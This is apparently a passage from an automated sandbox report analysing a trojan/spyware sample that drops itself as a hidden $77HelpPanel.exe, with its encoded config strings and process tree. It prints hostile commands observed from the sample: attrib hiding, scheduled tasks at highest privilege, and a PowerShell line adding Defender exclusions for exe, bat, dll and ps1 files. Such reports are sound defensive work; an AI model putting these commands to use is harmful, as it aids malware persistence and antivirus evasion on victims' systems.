'MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==', 'gcNMT5J3vCu7nOJR1C15TWa5Qxg+cCorVHQ5w+nihL26aqhmBCu4Tj/SUTeDcKFfK0OxIQrxe1XCWFafRGDQMe562nsPadbBetXfqHAibNPmwCUOEEPAdwDB0ce8mSpcGb5EZhhezD/PZT6RcB9sC2kSXf2dEtoJoJsQrhr912I=', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
                  Source: YDW0S5K7hi.exe, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: YDW0S5K7hi.exe, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77HelpPanel.exe.0.dr, Settings.csBase64 encoded string: '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'
                  Source: $77HelpPanel.exe.0.dr, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: $77HelpPanel.exe.0.dr, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: File.GetAccessControl
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: File.SetAccessControl
                  Source: $77HelpPanel.exe.0.dr, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: $77HelpPanel.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: $77HelpPanel.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: YDW0S5K7hi.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: YDW0S5K7hi.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: File.GetAccessControl
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: File.SetAccessControl
                  Source: YDW0S5K7hi.exe, Installation.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/10@2/2
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YDW0S5K7hi.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeMutant created: \Sessions\1\BaseNamedObjects\SilverMutex_RxWYRpnqXs
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9C90.tmpJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
                  Source: YDW0S5K7hi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: YDW0S5K7hi.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeFile read: C:\Users\user\Desktop\YDW0S5K7hi.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\YDW0S5K7hi.exe "C:\Users\user\Desktop\YDW0S5K7hi.exe"
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "\$77HelpPanel.exe" /AsAdmin
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver"Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9C90.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77HelpPanel.exe" /TR "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe \"\$77HelpPanel.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77HelpPanel.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "HelpPanel_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\YDW0S5K7hi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
